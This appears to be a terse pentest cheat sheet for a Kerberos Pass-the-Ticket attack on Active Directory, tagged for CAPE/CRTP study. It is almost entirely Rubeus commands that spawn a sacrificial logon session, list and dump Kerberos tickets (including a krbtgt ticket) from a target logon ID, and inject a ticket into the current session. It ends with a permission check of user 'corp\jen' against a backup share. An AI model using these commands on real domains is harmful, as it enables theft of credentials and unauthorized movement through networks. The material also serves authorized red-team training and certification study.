CAPECRTPkerberosactive-directory
Pass-the-Ticket
# Create a sacrificial process (show -> shows the created process)
.\Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show
# Check all the tickets that can be read and extracted
.\Rubeus.exe triage
# Extract the target ticket
.\Rubeus.exe dump /luid:0x89275d /service:krbtgt /nowrap
# Request a new TGT
Rubeus.exe renew /ticket:doIFVjCCBVKgAwIBBaEDA<SNIP> /ptt# Check jen's permissions
> whoami
corp\jen
> ls \\web04\backup
ls : Access to the path '\\web04\backup' is denied.Last updated